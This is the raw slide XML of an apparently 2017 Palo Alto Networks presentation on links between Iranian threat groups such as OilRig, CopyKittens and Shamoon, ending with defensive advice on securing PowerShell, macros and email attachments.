            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 4" descr="Image result for certificate icon"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2001520" y="22669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1713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006" y="1925022"/>
            <a:ext cx="9134652" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Concluding thoughts…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34644803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Explaining the softer links</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42</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317539" y="895795"/>
            <a:ext cx="7695245"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Movement of team members across organizations?</a:t>
            </a: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Sharing of ideas, tools, and sometimes even stolen data (certificates) within a closed circle?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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Coincidences due to use of similar proxy providers? (how do I even buy IP space in Germany if I’m in Iran?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Some combination of all of the above…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2780228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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Which links does PANW Tom believe are valid?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225695" y="796703"/>
            <a:ext cx="1957242"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B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OILRIG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6111965" y="796703"/>
            <a:ext cx="1957243"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B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>COPYKITTENS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299579" y="794760"/>
            <a:ext cx="1957243" cy="819178"/>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00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CADELLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225695" y="2335951"/>
            <a:ext cx="1957242"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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SHAMOON // DISTTRACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6111965" y="2336534"/>
            <a:ext cx="1957242"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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MAGICHOUND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205780" y="2336534"/>
            <a:ext cx="1957242" cy="819178"/>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2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GREENBUG &amp;&amp; STONEDRILL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093453" y="3898500"/>
            <a:ext cx="1957242"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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NEWSCASTER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225695" y="3898500"/>
            <a:ext cx="1957242" cy="819178"/>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atin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ROCKET KITTEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2477564" y="1021626"/>
            <a:ext cx="471185" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>~=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5392881" y="1021626"/>
            <a:ext cx="673129" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>~=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5426541" y="2543413"/>
            <a:ext cx="685424" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6788476" y="3262408"/>
            <a:ext cx="724432" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>~=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386670" y="4123423"/>
            <a:ext cx="679340" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>~=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rectangle 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205780" y="3898500"/>
            <a:ext cx="1957242" cy="819178"/>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accent5"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OTHER IRAN THREATS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Straight Connector 46"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3105694" y="366031"/>
            <a:ext cx="74477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105694" y="2169653"/>
            <a:ext cx="5181571" cy="2633005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="dash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
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131805" y="660500"/>
            <a:ext cx="8155460" cy="1094160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="dash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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="955192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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Wild, unfounded guesswork</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202597" y="960741"/>
            <a:ext cx="3648974" cy="461665"/>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ORGANISATION A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191875" y="1855579"/>
            <a:ext cx="3936521" cy="1938992"/>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MAGICHOUND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NEWSCASTER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ROCKET KITTEN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SHAMOON</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3259635" y="1849746"/>
            <a:ext cx="2147517" cy="1569660"/>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OILRIG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>COPYKITTENS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CADELLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163841" y="960741"/>
            <a:ext cx="3648974" cy="461665"/>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ORGANISATION B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125085" y="960741"/>
            <a:ext cx="3648974" cy="461665"/>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OTHER ORGS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125085" y="1665080"/>
            <a:ext cx="3936521" cy="1938992"/>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INFY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>STONEDRILL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RANRAN (?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GREENBUG (?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202596" y="1776892"/>
            <a:ext cx="2664379" cy="2185508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="dash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
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3241791" y="1776892"/>
            <a:ext cx="2558020" cy="2185508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="dash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
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125085" y="1751760"/>
            <a:ext cx="2558020" cy="2185508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>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latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2958323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200" dirty="0"/>
              <a:t>Actions you can take to defend yourselves…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2993CA60-2B53-4F4B-9B5D-BDFFCE129C5C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317500" y="730758"/>
            <a:ext cx="8471465" cy="3859530"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Google “Securing PowerShell” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Google “Securing Macros”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Review allowed file extensions for emails (prevents the CHM stuff etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Test your security solutions against publicly available toolkits (these are very popular with Iranian threat actors)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1"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887950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1869440" y="365760"/>
            <a:ext cx="7101840" cy="6494085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WITH SPECIAL THANKS TO....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOMINIK REICHEL (PANW)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
